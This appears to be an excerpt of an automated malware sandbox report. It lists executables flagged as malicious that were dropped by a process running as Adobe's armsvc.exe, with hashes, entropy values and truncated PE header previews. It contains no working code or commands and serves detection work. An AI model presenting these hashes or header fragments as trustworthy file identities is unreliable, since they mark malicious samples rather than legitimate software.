                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1248768
                                                                                                                                                                                                                            Entropy (8bit):4.675364844700586
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:xZlPGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:jlGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:80853AA178DA642F2DCAF2C82D0730C9
                                                                                                                                                                                                                            SHA1:7FA932894A154D3C1151634DAC67B344AD9D8DE2
                                                                                                                                                                                                                            SHA-256:72BD431D96563CB34607B743B95B4B4CD0304234D28664E13579212BE56F9E89
                                                                                                                                                                                                                            SHA-512:3CDA12E1832C3622128739030F45A4D7CD470E99214E68CDC15FC86C34F2C0509DF1E11557BF215D38D5F2FF5FE2C0C917A6478C7D1DD7D3C96750D063952D59
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0.......P.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1248768
                                                                                                                                                                                                                            Entropy (8bit):4.67536745738504
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:6NlPGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:MlGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:B34D874AAF984FA34B4D0014ADBE0CC0
                                                                                                                                                                                                                            SHA1:4D5D718117A0998D8AA77B65A49299A457AA2C90
                                                                                                                                                                                                                            SHA-256:5759A624EC90A04D290A20FECA3B70F2EDC1ACF4838FBA55672F2B29EF953874
                                                                                                                                                                                                                            SHA-512:5BAF6EDA83F3472912FD4B2CF6057582DA8909FE14CF595B842A7BFCDE09525EAA2AC2A8F006514F79328B4A135CB90E4B29D92F62E2BD48576080B478FDA3F1
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0......8........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1248768
                                                                                                                                                                                                                            Entropy (8bit):4.6753372448576735
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:xmmvGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:koGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:DBA43A6D86B8A48090D46C25DA313528
                                                                                                                                                                                                                            SHA1:C87CCC9A62B4FFAE5B6A94582E13C0D7115A0DC5
                                                                                                                                                                                                                            SHA-256:949C51779BD3BBC045E619E352B4F680532BA954BC6C94418C23FEFBAC6B4E61
                                                                                                                                                                                                                            SHA-512:ABA4596BCC1D68DAD086937D98A221C26660CEC080EEBB58547E2721E9DA707C6E7CF9756DC50EB6F933A2F62A2C2AB46DCC3F7B60A2190594397FFD44BAAF14
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0......M........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1248768
                                                                                                                                                                                                                            Entropy (8bit):4.676207379518071
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:EnmzGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:+kGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:C42422856A9ED16D33604AF04DB5D89B
                                                                                                                                                                                                                            SHA1:8D4650E0BDF375713B9691B40083D43D2A47E34F
                                                                                                                                                                                                                            SHA-256:E362C259AC206AB21D961D06FBF2E9FF244CAE8F799A1BA4BA332FA0D6A6B7BF
                                                                                                                                                                                                                            SHA-512:BD3ADE2502D4CA66B7E94F30808550C19354FAE466440057D34553DC0AC1B9AE2903543223AE04BDCD7E81F83426CD15C386AF823C4FDE7E3A5A441C3362B092
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0.............................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1248768
                                                                                                                                                                                                                            Entropy (8bit):4.675320782641669
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:8T5nGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:Q5GJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:50FD426913A1F9067513B366B0D09F19
                                                                                                                                                                                                                            SHA1:2E70E205A44FF024694F29BA8A61B45B1CAA9684
                                                                                                                                                                                                                            SHA-256:D65CD55D409EA722FDE54D5EBDC87044EF427DE39E03913196A1F26B0B13FEBB
                                                                                                                                                                                                                            SHA-512:C8FA7F5150B6B2F9835469112DE57E36F171ECD4F48A482EF8EEC4A6C1E09FA8E9F0BB519C8B357EE701D2DE84A934C8158CFC8A72EC2876214C4089F22F4D16
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0..............................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1248768
                                                                                                                                                                                                                            Entropy (8bit):4.675357404241606
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:Fw/PGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:WXGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:D6C3A6EEB2E4954E59C636AD8943BAFB
                                                                                                                                                                                                                            SHA1:76F87E4094F5AF06D03FC0D0FD626740F7B70095
                                                                                                                                                                                                                            SHA-256:BC9BADC78BC9C7DBD387BD1C34EF4B9C07529F8C738289D759346D995FEE7AF5
                                                                                                                                                                                                                            SHA-512:E4D4E6664B64A26760738E30C0781145A899FBE31935CE74648C90F0BC592358E47CF46DEF2CFDA41A74C2916E01D4AFE66FBF0725740739C7725873AD64A9BE
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0......z........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1248768
                                                                                                                                                                                                                            Entropy (8bit):4.675262319154278
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:7Am/GJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:soGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:523D77825263E9CE7A4F8B43F6D133EA
                                                                                                                                                                                                                            SHA1:86E9E45DEEEA70CC996219FD88E4B042A15D0992
                                                                                                                                                                                                                            SHA-256:5912A9DCD7946AB06B77D3423553A7C6F8D32556EB1041A5A485A900B32CBC71
                                                                                                                                                                                                                            SHA-512:13DEF488351C9B4CEA7DADF14C2FA44CB90B7BD8B1CB153E34C88CF71DE79297DFF5E28AD9D45B5AB5DA93BC4E2F645C8FC2BC8642075F9AC4A06BB9BC286510
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0.......u.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1248768
                                                                                                                                                                                                                            Entropy (8bit):4.675306495844584
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:q1SHGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:QMGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:32E86268850C642A64634353A3F59AE9
                                                                                                                                                                                                                            SHA1:46791C417510A8A62C79C91B45C6260D36BFF0A4
                                                                                                                                                                                                                            SHA-256:C5B0BECFAC0DA0A5924DB95C13063C17569A015CAB4F6A4656F281C570B5746D
                                                                                                                                                                                                                            SHA-512:8EF1FD361AC75481474CBC6B50DE934317C7B973402E87FC876D03FC81FF339F9B2CF43ACBE51DC6E4071FEA5AF0068EB0C98F68081AB8DA070EA38C1272A123
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0...............................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1248768
                                                                                                                                                                                                                            Entropy (8bit):4.675358432994195
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:VU/PGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:aXGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:AE4B9B9A203DD82A9A44AD635A7702FD
                                                                                                                                                                                                                            SHA1:110379E1F4CFE903D1CB61A5AD4F7F933A3220DA
                                                                                                                                                                                                                            SHA-256:B52D7938E4B4CDFE977DE19428C2981CFCB81EF1BFDC4334E78860B4232805B3
                                                                                                                                                                                                                            SHA-512:AA80E48829A9A18A15D7287F3DE4A0D1DDFD9CDCEF5329CE2727BB674FD59B89B2B8FB3049F2C8D620A2FF696C66B284A101FFDA3962BF0AFE45527FBEE47665
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0......;;.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1309184
                                                                                                                                                                                                                            Entropy (8bit):4.753518152881259
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:zEZGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:zEZGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:D37CFBF3358D06895EB64093F45FE50B
                                                                                                                                                                                                                            SHA1:642710A307CE1A28BD4CEF2F9A8FE9FC634202D7
                                                                                                                                                                                                                            SHA-256:4D489637C41625152C9F08D12A3B31190DF6EC1C28C91934AF94077B9D9FE16A
                                                                                                                                                                                                                            SHA-512:3D5DAFC7EE4A1244DA8B502DF02165F4418E7CF680DDB5E81BD60B72F82047EEC44483277F9368A209F851740A374CEFBBB468D496833433E46520694928791D
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.......................... ......}u..........................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc.......@......................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1249280
                                                                                                                                                                                                                            Entropy (8bit):4.674891910737304
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:aFQDGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:MWGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:29A41ADDC39299C4243B9DD8F6790648
                                                                                                                                                                                                                            SHA1:222266C473E6A187892E7D23C3271FD85FD02883
                                                                                                                                                                                                                            SHA-256:42146EAC71AFB522F84B6F048D48B305CE1CD5DBD2A82B2D34DF3F911E842A19
                                                                                                                                                                                                                            SHA-512:34D318DC9F7FAEDA70F8E14B09F21C67306B0EF06215233761DD6C530FAE4C982F8CE57657BD2F6AAFDD3A87E0B94BA14808A2D2F6D2957B67A4E2D214B25F2F
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..........................0......Z[.......................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc.......P.......0..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1405440
                                                                                                                                                                                                                            Entropy (8bit):4.922389017583568
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:ri7le3roA1GJ0eeQ2yPyzc+E7xonyVGc/dT5N:mloroAQJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:8EB568E9C01C38505C12D06331939E62
                                                                                                                                                                                                                            SHA1:50C5955EEC1F5BFC16883F5D8772A2875563F9AF
                                                                                                                                                                                                                            SHA-256:CBE86F16627DCBA45E26EAE55E6640E752AA0E9C7C9F922750A30A355BEF7668
                                                                                                                                                                                                                            SHA-512:5D89BDE8216CD669D6E466015D736B569206FB8F46D309609DAAF24499B133A0D7D71B70D9C50C8A9C3EABCF9B9EFF8E4DB930493A1B811AFA82D66658569C52
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..................................k..................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc..............................@...........................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1375744
                                                                                                                                                                                                                            Entropy (8bit):4.95026958866601
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:TNfQNBGJ0eeQ2yPyzc+E7xonyVGc/dT5N:pGsJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:98A145D104293A7812D0086395DBDCD7
                                                                                                                                                                                                                            SHA1:591B3262AD2AB3E86DAF8A84931EB38B6321C375
                                                                                                                                                                                                                            SHA-256:DD8D74CBA6533E1939BBD706502F9DA0FBC918139B24586C12AD398BB7F5E373
                                                                                                                                                                                                                            SHA-512:F0F025D4AEE0EA08966A30FB9BB08CB19D977F7F93FE5E73C1CD226379E8A979DAB10A9E59D25093D3804CD7B62F40701CD43226F2A868AAE2B8C9FF9E87F884
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@..........................0......Z.......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc.......@......................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1394176
                                                                                                                                                                                                                            Entropy (8bit):4.970379687280527
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:ANmt0LDILi2KkGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:vLisGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:F715656B652B95843AD9E9B265D6C318
                                                                                                                                                                                                                            SHA1:97621C2511CF3B2AD7342030214768E359D81601
                                                                                                                                                                                                                            SHA-256:C4E7E52B7A2515ECB93439C38426689D406942AEEB3ABCD847663B27D54AEE50
                                                                                                                                                                                                                            SHA-512:2C7DE89D7DB710EC9B60A33CE10F4933645524743A74E7D5873CC7AE874E29BA73EAE4332ABB015BF9E88D2952BC55382AC2B09A9BA63743FBC487A46F2E8CD8
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@..........................p......D............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1394176
                                                                                                                                                                                                                            Entropy (8bit):4.970373556229406
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:BNmt0LDILi2KkGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:ULisGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:C815F04CC38D91BC9355DFABA786C006
                                                                                                                                                                                                                            SHA1:03CF65D60100FE06136B839476938CBCEC80DBC8
                                                                                                                                                                                                                            SHA-256:75C89976929D050A0A84012D1895E190D3A01122D92A9BBAB7BD22A192DAA45C
                                                                                                                                                                                                                            SHA-512:5A27AA2CABE5D55329C0C4B18E012BB1E0027FFE891170FB7CE57E17AF7A429B7D02F8BEFF62D7EA0B9DCA856C51C443A4C86C0F215AF8A23D1BA89DC38F5890
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@..........................p.......8........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1449984
                                                                                                                                                                                                                            Entropy (8bit):4.920209036964111
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:ajuozXMGNUbTZGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:yfgGJ0eeQ2yPyzc+E7xonyVGc/dT5N
                                                                                                                                                                                                                            MD5:F31BAD0784BE18E94050B5506A49CBCC
                                                                                                                                                                                                                            SHA1:6DDBA67C230BF04C999D3E900670D5DCE4A7DC8C
                                                                                                                                                                                                                            SHA-256:F6C3B049FB42656790E6275A234B00457AB7895EF1DAE597C409B819DCA0B64E
                                                                                                                                                                                                                            SHA-512:0EC3DB2E0D483AC7E547310B60DE9232B4EEBDBACFCC64A44D25CF797BA82ED57ABF67E5BB3D45150F8F52780FFEA2327C8BF02130F33983548FE55EB0BF0539
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.............................0 .....eW.... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc.......0....... ..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1602560
                                                                                                                                                                                                                            Entropy (8bit):5.2786582921335965
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:abUO42K/EKGJ0eeQ2yPyzc+E7xonyVGc/dT5N:aRdJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:70B1421234148217B0EC5F17D642B944
                                                                                                                                                                                                                            SHA1:C77F9F8E2190366F78D1B398833DE7DF5D9479FD
                                                                                                                                                                                                                            SHA-256:E102C11EC346BB55B77B95EA39D07DE1644F7B7A1334ED8FC46A5AB4BA0D558F
                                                                                                                                                                                                                            SHA-512:82C69D63A24296ADD16D805194A22CFF93CA8BEF1CFB09DF5FE141A3CA7DB16CC5EFACFD93834DE657BAE50C2510FD65E2F068E9097D6A287FA9B129768C6AFD
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@..........................."......I........... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...............d..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):52712960
                                                                                                                                                                                                                            Entropy (8bit):7.961756483175891
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1572864:GKjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe0:BicZmsR3Lo/cnLe0
                                                                                                                                                                                                                            MD5:7E57872557DDC81C4FC76CAC18B583CB
                                                                                                                                                                                                                            SHA1:84285A9F21EA9612DAB7C160DDC7A4E8BD1DF5BE
                                                                                                                                                                                                                            SHA-256:62CB62D89747CDFBC22EA4904A7473BB53C640238C9CE184C1D2F75EDE1682FB
                                                                                                                                                                                                                            SHA-512:7D9099782ED5DF3EE92692442CE47EB76D4BABA1216B745F8E4BC7770A17C70011BD0D7592085168CDC154D2089F8B88EDA19C1B29A8A5CBF4C6F853F386285A
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
